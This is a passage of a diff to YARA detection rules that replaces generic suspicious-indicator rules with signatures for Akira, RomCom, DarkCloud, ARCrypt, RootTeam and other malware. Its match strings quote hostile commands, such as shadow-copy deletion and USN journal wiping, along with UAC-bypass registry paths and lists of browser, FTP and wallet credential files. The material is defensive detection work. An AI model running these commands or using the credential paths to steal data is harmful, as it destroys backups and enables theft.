"Detects Akira Ransomware Windows" author = "ditekSHen" - id = "e4e82d5a-a524-5fac-b14c-4e53a95f4f2c" - date = "2024-06-08" - modified = "2024-06-08" + id = "350ecf81-7926-5cd2-b0c8-2dd748775e74" + date = "2024-09-23" + modified = "2024-09-23" reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/indicator_suspicious.yar#L68-L77" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "4b893db727ea3ef07805058e9a93664dc01590f249158d9b825cc9cece935640" - score = 40 - quality = 41 + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/malware.yar#L10220-L10243" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "73dd0a1b21be8ff7362536f6b6255cd19510632782effd67a56d7656bebf04ff" + score = 75 + quality = 75 tags = "FILE" - importance = 20 strings: - $s1 = "\\Classes\\mscfile\\shell\\open\\command" ascii wide nocase - $s2 = "eventvwr.exe" ascii wide nocase + $x1 = "https://akira" ascii + $x2 = ":\\akira\\" ascii + $x3 = ".akira" ascii + $x4 = "akira_readme.txt" ascii + $x5 = "\\akira\\asio\\include\\asio\\impl\\co_spawn.hpp" ascii + $s1 = "Get-WmiObject Win32_Shadowcopy | Remove-WmiObject" ascii + $s2 = "Win32_ProcessStartup" fullword wide + $s3 = /Failed\sto\smake\s(part|full|spot)\sencrypt/ ascii wide + $s4 = "--encryption_" ascii + $s5 = "--share_file" ascii + $s6 = { 24 00 52 00 45 00 43 00 59 00 43 00 4C 00 45 00 2E 00 42 00 49 00 4E 00 00 00 00 00 6? 6? 6? 00 (24|57) 00 (52|69) 00 } + $s7 = " PUBLIC KEY-----" ascii + $s8 = ".onion" ascii + $s9 = "/Esxi_Build_Esxi6/./" ascii nocase + $s10 = "No path to encrypt" ascii + $s11 = "-fork" fullword ascii condition: - uint16(0)==0x5a4d and all of them + uint16(0)==0x5a4d and (3 of ($x*) or (1 of ($x*) and 4 of ($s*)) or 6 of ($s*)) } -import "time" import "pe" -rule DITEKSHEN_INDICATOR_SUSPICIOUS_EXE_Uacbypass_Cleanmgr : FILE +rule DITEKSHEN_MALWARE_Linux_Akira : FILE { meta: - description = "detects Windows exceutables potentially bypassing UAC using cleanmgr.exe" + description = "Detects Akira Ransomware Linux" author = "ditekSHen" - id = "cebbe22d-d54d-5a1e-978a-37ddd96133b7" - date = "2024-06-08" - modified = "2024-06-08" + id = "3ac144b3-c747-58e5-bc75-b3f90786f404" + date = "2024-09-23" + modified = "2024-09-23" reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/indicator_suspicious.yar#L79-L88" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "9b9e2789bee4f3b54384dabde028a7b6e70b3e0d66090d5141145a72df515db4" - score = 40 - quality = 41 + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/malware.yar#L10245-L10264" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "3a00154e1cfc442718e753641d3706ffd4dd8465525d0bb2854f74dfb1cf5dd0" + score = 75 + quality = 75 tags = "FILE" - importance = 20 strings: - $s1 = "\\Enviroment\\windir" ascii wide nocase - $s2 = "\\system32\\cleanmgr.exe" ascii wide nocase + $x1 = "https://akira" ascii + $x2 = ":\\akira\\" ascii + $x3 = ".akira" ascii + $x4 = "akira_readme.txt" ascii + $s1 = "--encryption_" ascii + $s2 = "--share_file" ascii + $s3 = { 00 24 52 65 63 79 63 6c 65 2e 42 69 6e 00 24 52 45 43 59 43 4c 45 2e 42 49 4e 00 } + $s4 = " PUBLIC KEY-----" ascii + $s5 = ".onion" ascii + $s6 = "/Esxi_Build_Esxi6/./" ascii nocase + $s7 = "No path to encrypt" ascii + $s8 = "-fork" fullword ascii condition: - uint16(0)==0x5a4d and all of them + uint16(0)==0x457f and (3 of ($x*) or (1 of ($x*) and 4 of ($s*)) or 6 of ($s*)) } -import "time" import "pe" -rule DITEKSHEN_INDICATOR_SUSPICIOUS_EXE_Enable_Officemacro : FILE +rule DITEKSHEN_MALWARE_Win_Romcom_Loader : FILE { meta: - description = "Detects Windows executables referencing Office macro registry keys. Observed modifying Office configurations via the registy to enable macros" - author = "ditekSHen" - id = "2cd26bc8-33c7-5628-982f-dc59ce158082" - date = "2024-06-08" - modified = "2024-06-08" + description = "Hunt for RomCom loader" + author = "ditekShen" + id = "49a5398a-e28d-51e2-90d5-479d815f9967" + date = "2024-09-23" + modified = "2024-09-23" reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/indicator_suspicious.yar#L90-L108" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "18f66cff1fe2ab32366bf385bfe08f4895071c83e26812709eeb334857754c0f" - score = 40 - quality = 39 + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/malware.yar#L10291-L10307" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "7aef88aa9f201c3a1852d63b17c14e44c7c2a7dfe94a9bc77897a4aa0eb97486" + score = 75 + quality = 75 tags = "FILE" - importance = 20 - - strings: - $s1 = "\\Word\\Security\\VBAWarnings" ascii wide - $s2 = "\\PowerPoint\\Security\\VBAWarnings" ascii wide - $s3 = "\\Excel\\Security\\VBAWarnings" ascii wide - $h1 = "5c576f72645c53656375726974795c5642415761726e696e6773" nocase ascii wide - $h2 = "5c506f776572506f696e745c53656375726974795c5642415761726e696e6773" nocase ascii wide - $h3 = "5c5c457863656c5c5c53656375726974795c5c5642415761726e696e6773" nocase ascii wide - $d1 = "5c%57%6f%72%64%5c%53%65%63%75%72%69%74%79%5c%56%42%41%57%61%72%6e%69%6e%67%73" nocase ascii - $d2 = "5c%50%6f%77%65%72%50%6f%69%6e%74%5c%53%65%63%75%72%69%74%79%5c%56%42%41%57%61%72%6e%69%6e%67%73" nocase ascii - $d3 = "5c%5c%45%78%63%65%6c%5c%5c%53%65%63%75%72%69%74%79%5c%5c%56%42%41%57%61%72%6e%69%6e%67%73" nocase ascii condition: - uint16(0)==0x5a4d and (2 of ($s*) or 2 of ($h*) or 2 of ($d*)) + uint16(0)==0x5a4d and pe.is_dll() and (pe.exports("DllCanUnloadNow") and pe.exports("DllGetClassObject") and pe.exports("DllRegisterServer") and pe.exports("DllUnregisterServer") and pe.exports("GetProxyDllInfo")) and for any fn in pe.export_details : (fn.forward_name contains "Dll") } -import "time" import "pe" -rule DITEKSHEN_INDICATOR_SUSPICIOUS_EXE_Disable_Officeprotectedview : FILE +rule DITEKSHEN_MALWARE_Win_Romcom_Worker : FILE { meta: - description = "Detects Windows executables referencing Office ProtectedView registry keys. Observed modifying Office configurations via the registy to disable ProtectedView" - author = "ditekSHen" - id = "fed81219-d141-5fbf-a7b6-518e3d4de6f6" - date = "2024-06-08" - modified = "2024-06-08" + description = "Hunt for RomCom worker" + author = "ditekShen" + id = "ce545a33-731c-5ecd-b02e-cedf24f75cc7" + date = "2024-09-23" + modified = "2024-09-23" reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/indicator_suspicious.yar#L110-L128" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "14b2c19ec1f1ade9285f9e73a8779865c1e09d5ad1df2e0469b5f4a5eb278110" - score = 40 - quality = 39 + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/malware.yar#L10309-L10322" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "488db046458585882a4709438042b57e02d7dbc06483fdfdfc463a64ee8db203" + score = 75 + quality = 73 tags = "FILE" - importance = 20 strings: - $s1 = "\\Security\\ProtectedView\\DisableInternetFilesInPV" ascii wide - $s2 = "\\Security\\ProtectedView\\DisableAttachementsInPV" ascii wide - $s3 = "\\Security\\ProtectedView\\DisableUnsafeLocationsInPV" ascii wide - $h1 = "5c53656375726974795c50726f746563746564566965775c44697361626c65496e7465726e657446696c6573496e5056" nocase ascii wide - $h2 = "5c53656375726974795c50726f746563746564566965775c44697361626c65417474616368656d656e7473496e5056" nocase ascii wide - $h3 = "5c53656375726974795c50726f746563746564566965775c44697361626c65556e736166654c6f636174696f6e73496e5056" nocase ascii wide - $d1 = "5c%53%65%63%75%72%69%74%79%5c%50%72%6f%74%65%63%74%65%64%56%69%65%77%5c%44%69%73%61%62%6c%65%49%6e%74%65%72%6e%65%74%46%69%6c%65%73%49%6e%50%56" nocase ascii - $d2 = "5c%53%65%63%75%72%69%74%79%5c%50%72%6f%74%65%63%74%65%64%56%69%65%77%5c%44%69%73%61%62%6c%65%41%74%74%61%63%68%65%6d%65%6e%74%73%49%6e%50%56" nocase ascii - $d3 = "5c%53%65%63%75%72%69%74%79%5c%50%72%6f%74%65%63%74%65%64%56%69%65%77%5c%44%69%73%61%62%6c%65%55%6e%73%61%66%65%4c%6f%63%61%74%69%6f%6e%73%49%6e%50%56" nocase ascii + $s1 = "UpdateProcThreadAttribute" fullword ascii + $s2 = "WriteFile" fullword ascii + $s3 = "GetAdaptersAddresses" fullword ascii nocase + $s4 = /inflate\s\d+\.\d+\.\d+\sCopyright/ ascii + $s5 = "SetHandleInformation" fullword ascii + $s6 = "PeekNamedPipe" fullword ascii condition: - uint16(0)==0x5a4d and (2 of ($s*) or 2 of ($h*) or 2 of ($d*)) + uint16(0)==0x5a4d and pe.is_dll() and pe.number_of_exports==1 and pe.exports("Main") and all of them } -import "time" import "pe" -rule DITEKSHEN_INDICATOR_SUSPICIOUS_EXE_Sandboxproductid : FILE +rule DITEKSHEN_MALWARE_Win_Romcom_Dropper : FILE { meta: - description = "Detects binaries and memory artifacts referencing sandbox product IDs" - author = "ditekSHen" - id = "5af0ace7-6ffb-5695-94c5-d8172d326662" - date = "2024-06-08" - modified = "2024-06-08" + description = "Hunt for RomCom worker" + author = "ditekShen" + id = "1b77122d-95d7-535d-897e-b542da17f499" + date = "2024-09-23" + modified = "2024-09-23" reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/indicator_suspicious.yar#L130-L149" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "3a047ef7e70956e1c2222bde47036d7fff6d98cd8a5df81ea85584a3b5006d4a" - score = 40 - quality = 45 + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/malware.yar#L10324-L10335" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "89f62f71e5870c1e5d14bc32dd3508da620f5fa85494251c69682eb09d630029" + score = 75 + quality = 75 tags = "FILE" - importance = 20 strings: - $id1 = "76487-337-8429955-22614" fullword ascii wide - $id2 = "76487-644-3177037-23510" fullword ascii wide - $id3 = "55274-640-2673064-23950" fullword ascii wide - $id4 = "76487-640-1457236-23837" fullword ascii wide - $id5 = "76497-640-6308873-23835" fullword ascii wide - $id6 = "76487-640-1464517-23259" fullword ascii wide - $id7 = "76487 - 337 - 8429955 - 22614" fullword ascii wide - $id8 = "76487 - 644 - 3177037 - 23510" fullword ascii wide - $id9 = "55274 - 640 - 2673064 - 23950" fullword ascii wide - $id10 = "76487 - 640 - 1457236 - 23837" fullword ascii wide - $id11 = "76497 - 640 - 6308873 - 23835" fullword ascii wide - $id12 = "76487 - 640 - 1464517 - 23259" fullword ascii wide + $s1 = "\\REGISTRY\\MACHINE\\SOFTWARE\\Classes" wide nocase + $s2 = "\\REGISTRY\\USER" wide nocase + $s3 = "BINARY" fullword wide + $s4 = "POST" fullword wide condition: - uint16(0)==0x5a4d and 2 of them + uint16(0)==0x5a4d and pe.is_dll() and pe.number_of_exports==1 and pe.exports("Main") and 3 of them } -import "time" import "pe" -rule DITEKSHEN_INDICATOR_SUSPICIOUS_AHK_Downloader : FILE +rule DITEKSHEN_MALWARE_Win_STEALDEAL : FILE { meta: - description = "Detects AutoHotKey binaries acting as second stage droppers" - author = "ditekSHen" - id = "ac8320ed-a9e1-5660-a50f-ec010ac162a6" - date = "2024-06-08" - modified = "2024-06-08" + description = "Hunt for STEALDEAL stealer" + author = "ditekShen" + id = "4685fea3-4050-5395-af2b-cb0ba4104b47" + date = "2024-09-23" + modified = "2024-09-23" reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/indicator_suspicious.yar#L184-L196" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "8806d8c03adb4ea4cd9b806f8f8c21e561b39b5602c70d09ed193e35e1502d35" - score = 40 - quality = 45 + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/malware.yar#L10337-L10348" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "366c33b06ed9403b2b840d98e25287333eb52f2588f747981b3c0c3baf4fd27a" + score = 75 + quality = 50 tags = "FILE" - importance = 20 strings: - $d1 = "URLDownloadToFile, http" ascii - $d2 = "URLDownloadToFile, file" ascii - $s1 = ">AUTOHOTKEY SCRIPT<" fullword wide - $s2 = "open \"%s\" alias AHK_PlayMe" fullword wide - $s3 = /AHK\s(Keybd|Mouse)/ fullword wide + $x1 = "stealDll.dll" fullword ascii + $s1 = "SqlExec" fullword ascii + $s2 = "etilqs_" fullword ascii + $s3 = "SUBQUERY %u" fullword ascii condition: - uint16(0)==0x5a4d and (1 of ($d*) and 1 of ($s*)) + uint16(0)==0x5a4d and pe.is_dll() and pe.exports("stub") and (1 of ($x*) or all of ($s*)) } -import "time" import "pe" -rule DITEKSHEN_INDICATOR_SUSPICIOUS_EXE_Uacbypass_CMSTPCOM : T1218 FILE +rule DITEKSHEN_MALWARE_Win_Darkcloud : FILE { meta: - description = "Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)" + description = "Detects DarkCloud infostealer" author = "ditekSHen" - id = "cdcf6e29-6ee7-5ac7-bd52-c8d42f3f8bf6" - date = "2024-06-08" - modified = "2024-06-08" + id = "e29e1dc7-87b8-5d6b-b73b-460dc2530875" + date = "2024-09-23" + modified = "2024-09-23" reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/indicator_suspicious.yar#L198-L213" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "d198db97901475c0dd10603875fc339d8a7c6d40c7f9c22cda31bb0b1d6d0f2a" - score = 40 - quality = 39 - tags = "T1218, FILE" - importance = 20 + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/malware.yar#L10350-L10371" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "7826cc4185d6edb760d062019e0fa30f800c34e5fb4b0eedcfb17081e6c7643d" + score = 75 + quality = 48 + tags = "FILE" strings: - $guid1 = "{3E5FC7F9-9A51-4367-9063-A120244FBEC7}" ascii wide nocase - $guid2 = "{3E000D72-A845-4CD9-BD83-80C07C3B881F}" ascii wide nocase - $guid3 = "{BA126F01-2166-11D1-B1D0-00805FC1270E}" ascii wide nocase - $s1 = "CoGetObject" fullword ascii wide - $s2 = "Elevation:Administrator!new:" fullword ascii wide + $x1 = "=DARKCLOUD=" wide + $x2 = "#DARKCLOUD#" wide + $x3 = "DARKCLOUD" wide + $s1 = "DC-Creds" fullword wide + $s2 = "shell.application" fullword wide + $s3 = "VBSQLite3.dll" ascii wide nocase + $s4 = "getbinaryvalue" fullword wide + $s5 = "sqlite_exec" fullword ascii + $i1 = "RegWrite" fullword wide + $i2 = "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run" wide + $i3 = "\\Templates\\Stub\\Project" wide + $i4 = "\\Credentials" wide + $i5 = "SELECT " wide + $i6 = "\\163MailContacts.txt" fullword wide condition: - uint16(0)==0x5a4d and (1 of ($guid*) and 1 of ($s*)) + uint16(0)==0x5a4d and ((1 of ($x*) and (3 of ($s*) or 3 of ($i*))) or ( all of ($s*) and 1 of ($i*)) or (4 of ($s*) and 4 of ($i*))) } -import "time" import "pe" -rule DITEKSHEN_INDICATOR_SUSPICIOUS_EXE_References_Confidential_Data_Store : FILE +rule DITEKSHEN_MALWARE_Win_Arcrypt : FILE { meta: - description = "Detects executables referencing many confidential data stores found in browsers, mail clients, cryptocurreny wallets, etc. Observed in information stealers" + description = "Detects ARCrypt / ChileLocker ransomware" author = "ditekSHen" - id = "07223564-bf4f-5fcd-ad3d-b67eb3baea8e" - date = "2024-06-08" - modified = "2024-06-08" + id = "a53bbae6-a321-549d-9d45-e1a408d08740" + date = "2024-09-23" + modified = "2024-09-23" reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/indicator_suspicious.yar#L345-L359" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "5350f79b01e8e8ae9e0607aa02965cd9ccc52c59a901abcb51e401476cb0fa3a" - score = 40 - quality = 31 + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/malware.yar#L10373-L10399" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "cc9fa68d093fdf9745a06beb28e29108cb2ba846122ce097ad892213b1edba25" + score = 75 + quality = 75 tags = "FILE" - importance = 20 strings: - $s1 = "key3.db" nocase ascii wide - $s2 = "key4.db" nocase ascii wide - $s3 = "cert8.db" nocase ascii wide - $s4 = "logins.json" nocase ascii wide - $s5 = "account.cfn" nocase ascii wide - $s6 = "wand.dat" nocase ascii wide - $s7 = "wallet.dat" nocase ascii wide + $c1 = "readme_for_unlock.txt" wide + $c2 = "vssadmin.exe delete shadows /all /quiet" wide + $c3 = "START /b \"\" cmd /c wmic /node:" wide + $c4 = "START /b \"\" cmd /c DEL \"" wide + $c5 = "process call create cmd /c START" wide + $c6 = "net config server /autodisconnect:" wide + $c7 = "/NOBREAK>NUL) ELSE (START /b \"\" cmd /c DEL \"%~f" ascii + $c8 = ":\\_ARC\\_WorkSolution\\cryptopp" ascii + $e1 = /\.crYpt([A-F]{0,1}(\d+)?)?/ fullword wide + $e2 = ".dnt___.crYpt" wide nocase + $s1 = "create_directory" fullword ascii + $s2 = "create_directories" fullword ascii + $s3 = "NoClose" fullword ascii + $s4 = "StartMenuLogOff" fullword ascii + $s5 = "NoLogOff" fullword ascii + $s6 = "DisableTaskMgr" fullword ascii + $s7 = "DisableChangePassword" fullword ascii + $s8 = "HideFastUserSwitching" fullword ascii + $s9 = "RemotePath" fullword ascii condition: - uint16(0)==0x5a4d and 3 of them + uint16(0)==0x5a4d and (5 of ($c*) or 7 of ($s*) or (3 of ($c*) and 4 of ($s*)) or (1 of ($e*) and (1 of ($c*) and 1 of ($s*))) or ( all of ($e*) and (1 of ($c*) or 1 of ($s*)))) } -import "time" import "pe" -rule DITEKSHEN_INDICATOR_SUSPICIOUS_EXE_Referenfces_File_Transfer_Clients : FILE +rule DITEKSHEN_MALWARE_Win_Rootteamstealer : FILE { meta: - description = "Detects executables referencing many file transfer clients. Observed in information stealers" + description = "Detects RootTeam infostealer" author = "ditekSHen" - id = "0967c8d6-fc80-5341-9974-c6f16f024c2c" - date = "2024-06-08" - modified = "2024-06-08" + id = "3b57ff3e-09cf-52be-ac7f-45ee832d70ab" + date = "2024-09-23" + modified = "2024-09-23" reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/indicator_suspicious.yar#L418-L472" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "49daece8c3da43b3dba26ab6f71fa5c27d3a6ab2c0427b3d2613c1feb25458de" - score = 40 - quality = 20 + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/malware.yar#L10401-L10417" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "d1693865253067527d58c980653d550b55d022d5a394b88090a958e5d5818143" + score = 75 + quality = 75 tags = "FILE" - importance = 20 strings: - $s1 = "FileZilla\\recentservers.xml" ascii wide - $s2 = "Ipswitch\\WS_FTP\\" ascii wide - $s3 = "SOFTWARE\\\\Martin Prikryl\\\\WinSCP 2\\\\Sessions" ascii wide - $s4 = "SOFTWARE\\Martin Prikryl\\WinSCP 2\\Sessions" ascii wide - $s5 = "CoreFTP\\sites" ascii wide - $s6 = "FTPWare\\COREFTP\\Sites" ascii wide - $s7 = "HKEY_CURRENT_USERSoftwareFTPWareCOREFTPSites" ascii wide - $s8 = "FTP Navigator\\Ftplist.txt" ascii wide - $s9 = "FlashFXP\\3quick.dat" ascii wide - $s10 = "SmartFTP\\" ascii wide - $s11 = "cftp\\Ftplist.txt" ascii wide - $s12 = "Software\\DownloadManager\\Passwords\\" ascii wide - $s13 = "jDownloader\\config\\database.script" ascii wide - $s14 = "FileZilla\\sitemanager.xml" ascii wide - $s15 = "Far Manager\\Profile\\PluginsData\\" ascii wide - $s16 = "FTPGetter\\Profile\\servers.xml" ascii wide - $s17 = "FTPGetter\\servers.xml" ascii wide - $s18 = "Estsoft\\ALFTP\\" ascii wide - $s19 = "Far\\Plugins\\FTP\\" ascii wide - $s20 = "Far2\\Plugins\\FTP\\" ascii wide - $s21 = "Ghisler\\Total Commander" ascii wide - $s22 = "LinasFTP\\Site Manager" ascii wide - $s23 = "CuteFTP\\sm.dat" ascii wide - $s24 = "FlashFXP\\4\\Sites.dat" ascii wide - $s25 = "FlashFXP\\3\\Sites.dat" ascii wide - $s26 = "VanDyke\\Config\\Sessions\\" ascii wide - $s27 = "FTP Explorer\\" ascii wide - $s28 = "TurboFTP\\" ascii wide - $s29 = "FTPRush\\" ascii wide - $s30 = "LeapWare\\LeapFTP\\" ascii wide - $s31 = "FTPGetter\\" ascii wide - $s32 = "Far\\SavedDialogHistory\\" ascii wide - $s33 = "Far2\\SavedDialogHistory\\" ascii wide - $s34 = "GlobalSCAPE\\CuteFTP " ascii wide - $s35 = "Ghisler\\Windows Commander" ascii wide - $s36 = "BPFTP\\Bullet Proof FTP\\" ascii wide - $s37 = "Sota\\FFFTP" ascii wide - $s38 = "FTPClient\\Sites" ascii wide - $s39 = "SOFTWARE\\Robo-FTP 3.7\\" ascii wide - $s40 = "MAS-Soft\\FTPInfo\\" ascii wide - $s41 = "SoftX.org\\FTPClient\\Sites" ascii wide - $s42 = "BulletProof Software\\BulletProof FTP Client\\" ascii wide - $s43 = "BitKinex\\bitkinex.ds" ascii wide - $s44 = "Frigate3\\FtpSite.XML" ascii wide - $s45 = "Directory Opus\\ConfigFiles" ascii wide - $s56 = "SoftX.org\\FTPClient\\Sites" ascii wide - $s57 = "South River Technologies\\WebDrive\\Connections" ascii wide + $x1 = "RootTeamStl" ascii + $x2 = "Bot: https://t.me/rootteam_bot" ascii + $x3 = "rootteam_bot" ascii + $x4 = "Root Team" ascii + $s1 = "-ldflags=\"-s -w -H windowsgui -X" ascii + $s2 = "'RootTeamStl/vars." ascii + $s3 = "{ Hostname string \"json:\\\"hostname\\\"\"; EncryptedUsername string \"json:\\\"encryptedUsername\\\"\"; EncryptedPassword string \"json:\\\"encryptedPassword\\\"\" }" ascii + $s4 = "\\Program Files (x86)\\Steam\\config\\loginusers.vdf" ascii + $s5 = /RootTeamStl\/managers\/(browser|coldwallets|discord|filegrabber|steam|userinformation)?/ ascii condition: - uint16(0)==0x5a4d and 6 of them + uint16(0)==0x5a4d and (3 of ($x*) or (1 of ($x*) and 3 of ($s*)) or 4 of ($s*) or 5 of them ) } -import "time" import "pe" -rule DITEKSHEN_INDICATOR_SUSPICIOUS_Usndeletejournal : FILE +rule DITEKSHEN_MALWARE_Win_Espioloader : FILE { meta: - description = "Detects executables containing anti-forensic artifacts of deleting USN change journal. Observed in ransomware" + description = "Detects Espio loader and obfuscator" author = "ditekSHen" - id = "eafc7ed9-d0e7-562d-8215-6f3feddee27a" - date = "2024-06-08" - modified = "2024-06-08" + id = "fb2be984-abd6-5f71-b448-d41c9c3e35c5" + date = "2024-09-23" + modified = "2024-09-23" reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/indicator_suspicious.yar#L612-L628" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "1920fc2bc8c3628016bb91403960f5fbb101b5822f553c1f28d9502841a9832c" - score = 40 - quality = 35 + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/malware.yar#L10438-L10451" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "8ad77a50db48f12e6f6465652b24fc1daa56375bb27e37e0eead1bea55b89e0c" + score = 75 + quality = 75 tags = "FILE" - importance = 20 + clamav_sig = "MALWARE.Win.EspioLoader" strings: - $cmd1 = "fsutil.exe" ascii wide nocase - $s1 = "usn deletejournal /D C:" ascii wide nocase - $s2 = "fsutil.exe usn deletejournal" ascii wide nocase - $s3 = "fsutil usn deletejournal" ascii wide nocase - $s4 = "fsutil file setZeroData offset=0" ascii wide nocase - $ne1 = "fsutil usn readdata C:\\Temp\\sample.txt" wide - $ne2 = "fsutil transaction query {0f2d8905-6153-449a-8e03-7d3a38187ba1}" wide - $ne3 = "fsutil resource start d:\\foobar d:\\foobar\\LogDir\\LogBLF::TxfLog d:\\foobar\\LogDir\\LogBLF::TmLog" wide - $ne4 = "fsutil objectid query C:\\Temp\\sample.txt" wide + $pdb = /\\loader\\x64\\(Release|Debug)\\Espio\.pdb/ ascii + $s1 = "obfuscatedPayload" fullword wide + $s2 = "OBFUSCATEDPAYLOAD" fullword wide + $s3 = "\\??\\C:\\Windows\\System32\\werfault.exe" fullword wide + $s4 = "C:\\windows\\system32\\ntdll.dll" fullword ascii condition: - uint16(0)==0x5a4d and ( not any of ($ne*) and ((1 of ($cmd*) and 1 of ($s*)) or 1 of ($s*))) + uint16(0)==0x5a4d and ($pdb or 3 of ($s*)) } -import "time" import "pe" -rule DITEKSHEN_INDICATOR_SUSPICIOUS_Geninfostealer : FILE +rule DITEKSHEN_MALWARE_Win_Celestybinderloader : FILE { meta: - description = "Detects executables containing common artifacts observed in infostealers" + description = "Detects Celesty Binder loader" author = "ditekSHen" - id = "531d8f7f-dee5-5d05-9293-f1ab5d5ac780" - date = "2024-06-08" - modified = "2024-06-08" + id = "9c3404b7-311c-565d-b0fa-cfa80ba97289" + date = "2024-09-23" + modified = "2024-09-23" reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/indicator_suspicious.yar#L630-L657" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "f9e6f6b470e010d362db55fcf563f85a3a408ef8331c04a157f2676442b63b1a" - score = 40 - quality = 31 + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/malware.yar#L10453-L10466" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "8c9ffd48c9c8cd345dccfb48bcb345282f9978f7cf906a61e2ea81c48486b16d" + score = 75 + quality = 75 tags = "FILE" - importance = 20 strings: - $f1 = "FileZilla\\recentservers.xml" ascii wide - $f2 = "FileZilla\\sitemanager.xml" ascii wide - $f3 = "SOFTWARE\\\\Martin Prikryl\\\\WinSCP 2\\\\Sessions" ascii wide - $b1 = "Chrome\\User Data\\" ascii wide - $b2 = "Mozilla\\Firefox\\Profiles" ascii wide - $b3 = "Software\\Microsoft\\Internet Explorer\\IntelliForms\\Storage2" ascii wide - $b4 = "Opera Software\\Opera Stable\\Login Data" ascii wide - $b5 = "YandexBrowser\\User Data\\" ascii wide - $s1 = "key3.db" nocase ascii wide - $s2 = "key4.db" nocase ascii wide - $s3 = "cert8.db" nocase ascii 